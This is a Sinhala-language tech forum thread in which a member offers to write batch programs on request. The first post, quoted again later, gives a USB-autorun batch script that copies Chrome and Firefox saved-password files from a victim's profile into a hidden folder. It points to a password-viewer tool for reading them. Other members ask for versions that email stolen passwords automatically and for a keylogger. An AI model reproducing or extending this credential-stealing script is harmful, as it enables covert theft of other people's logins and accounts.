ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here
ඔයලට ඕනම Batch Program ඉල්ලන්න,
#1
යලට ඕනම Batch Program ඉල්ලන්නAngel  මම එව හදල දෙන්නම් , (100% ඔක්කොම නෙවෙයි Big Grin  මට පුලුවන්නම්.... Big Grin   )

::: folder ekak hadala , me batch file eka dala , autorun wena software ekak dala ganna pen ekata ,
::: oyalata internet eken balaganna puluwan search karala password / user name save wena thana , eka me
::: palleha Copy kiyala gahala add karaganna , browser eken browser ekata oka wenas wenawa,
::: koma hari pass/usern.. gaththoth ewa balanna puluwan :-http://www.mediafire.com/folder/b8qat8zovmg7b/webbrowserpassview

@echo off
cls
cd <folder>
copy "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
copy "%APPDATA%\Mozilla\Firefox\Profile\k1pmnocc.default\login.json"
copy "%APPDATA%\Mozilla\Firefox\Profile\k1pmnocc.default\Key4"
:::oyata ona browser eken pass save wena location eka internet eken balala mekata danna .
ping localhost -n 2 >nul
cls
attrib +s +h <folder>
exit

seen eka therune neththam FB ekan mata msg ekak dahan , mama kiyala dennam 
:- 

[To see links please login or register here]

#2
Smile  run krpu gaman browser saved password mata email wenna batch file ekak hdla dennako Big Grin
_____  _  _ _____ _____ _____ _____  _____
|  __ \| | | |  _  /  ___|_  _|  _  |/ __  \  ®
| |  \/| |_| | | | \ `--.  | | | |_| |`' / /'
| | __ |  _  | | | |`--. \ | | \____ |  / / 
| |_\ \| | | \ \_/ /\__/ / | | .___/ /./ /___
\____/\_| |_/\___/\____/  \_/ \____/ \_____/
1
Reply
#3
(11-25-2019, 07:57 AM)dimuth92 Wrote: Smile  run krpu gaman browser saved password mata email wenna batch file ekak hdla dennako Big Grin
mamath ehema hadanna patta try ekka dunna kaleyak , mama ai balannam hadanna , pen eka gahapu gawan run wena ekkak nam hadala denna puluwan ,
Big Grin
Reply
#4
pen eka gahapu gaman saved email and password enna keylogger ekk denna
1
Reply
#5
(11-25-2019, 11:13 PM)Eshan Theekshana Wrote:
(11-25-2019, 07:57 AM)dimuth92 Wrote: Smile  run krpu gaman browser saved password mata email wenna batch file ekak hdla dennako Big Grin
mamath ehema hadanna patta try ekka dunna kaleyak , mama ai balannam hadanna , pen eka gahapu gawan run wena ekkak nam hadala denna puluwan ,
Big Grin
ela thanks
_____  _  _ _____ _____ _____ _____  _____
|  __ \| | | |  _  /  ___|_  _|  _  |/ __  \  ®
| |  \/| |_| | | | \ `--.  | | | |_| |`' / /'
| | __ |  _  | | | |`--. \ | | \____ |  / / 
| |_\ \| | | \ \_/ /\__/ / | | .___/ /./ /___
\____/\_| |_/\___/\____/  \_/ \____/ \_____/
1
Reply
#6
(11-25-2019, 07:57 AM)dimuth92 Wrote: Smile  run krpu gaman browser saved password mata email wenna batch file ekak hdla dennako Big Grin
::: folder ekak hadala , me batch file eka dala , autorun wena software ekak dala ganna pen ekata ,
::: oyalata internet eken balaganna puluwan search karala password / user name save wena thana , eka me
::: palleha Copy kiyala gahala add karaganna , browser eken browser ekata oka wenas wenawa,
::: koma hari pass/usern.. gaththoth ewa balanna puluwan :-http://www.mediafire.com/folder/b8qat8zovmg7b/webbrowserpassview

@echo off
cls
cd <folder>
copy "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
copy "%APPDATA%\Mozilla\Firefox\Profile\k1pmnocc.default\login.json"
copy "%APPDATA%\Mozilla\Firefox\Profile\k1pmnocc.default\Key4"
:::oyata ona browser eken pass save wena location eka internet eken balala mekata danna .
ping localhost -n 2 >nul
cls
attrib +s +h <folder>
exit
Reply
#7
Exclamation 
(11-27-2019, 05:53 AM)dimuth92 Wrote:
(11-25-2019, 11:13 PM)Eshan Theekshana Wrote:
(11-25-2019, 07:57 AM)dimuth92 Wrote: Smile  run krpu gaman browser saved password mata email wenna batch file ekak hdla dennako Big Grin
mamath ehema hadanna patta try ekka dunna kaleyak , mama ai balannam hadanna , pen eka gahapu gawan run wena ekkak nam hadala denna puluwan ,
Big Grin
ela thanks
THANKS BRO ,I'll try it 
_____  _  _ _____ _____ _____ _____  _____
|  __ \| | | |  _  /  ___|_  _|  _  |/ __  \  ®
| |  \/| |_| | | | \ `--.  | | | |_| |`' / /'
| | __ |  _  | | | |`--. \ | | \____ |  / / 
| |_\ \| | | \ \_/ /\__/ / | | .___/ /./ /___
\____/\_| |_/\___/\____/  \_/ \____/ \_____/
Reply
#8
මචං නටේවර්ක් ඒක‌ේ තිය‌ෙ‌න, Run ව‌ෙ‌න හැම PC 1ක‌ේම, IP Adders 1යි, PC Name 1යි, List 1ක් විදියට ප‌ෙන්නන්න, BAT 1ක් හදන්න පුලුවන්ද...?
(Wifi/Lan Network/Host pot)- ම‌ොක‌ේ හිටියත් network 1ක‌ේ තිය‌ෙ‌න Pc 1ක Bat 1ක Run කරපු ගමන් ප‌ෙ‌න්නන්න ඔ්නි.
We don't know everything
in this world
Reply
#9
Batch programming අපිටත් උගන්නන්නකෝ අයියේ .......
Reply
#10
(12-04-2019, 10:43 AM)zeal7 Wrote: මචං නටේවර්ක් ඒක‌ේ තිය‌ෙ‌න, Run ව‌ෙ‌න හැම PC 1ක‌ේම, IP Adders 1යි,  PC  Name 1යි, List  1ක් විදියට ප‌ෙන්නන්න, BAT 1ක් හදන්න පුලුවන්ද...?
(Wifi/Lan Network/Host pot)- ම‌ොක‌ේ හිටියත් network 1ක‌ේ තිය‌ෙ‌න Pc 1ක Bat 1ක Run කරපු ගමන් ප‌ෙ‌න්නන්න ඔ්නි.
ewata software thiyei

(12-04-2019, 11:05 AM)Prohacker Wrote: Batch programming අපිටත් උගන්නන්නකෝ අයියේ .......

[To see links please login or register here]

_____  _  _ _____ _____ _____ _____  _____
|  __ \| | | |  _  /  ___|_  _|  _  |/ __  \  ®
| |  \/| |_| | | | \ `--.  | | | |_| |`' / /'
| | __ |  _  | | | |`--. \ | | \____ |  / / 
| |_\ \| | | \ \_/ /\__/ / | | .___/ /./ /___
\____/\_| |_/\___/\____/  \_/ \____/ \_____/
Reply
Users browsing this thread: 1 Guest(s)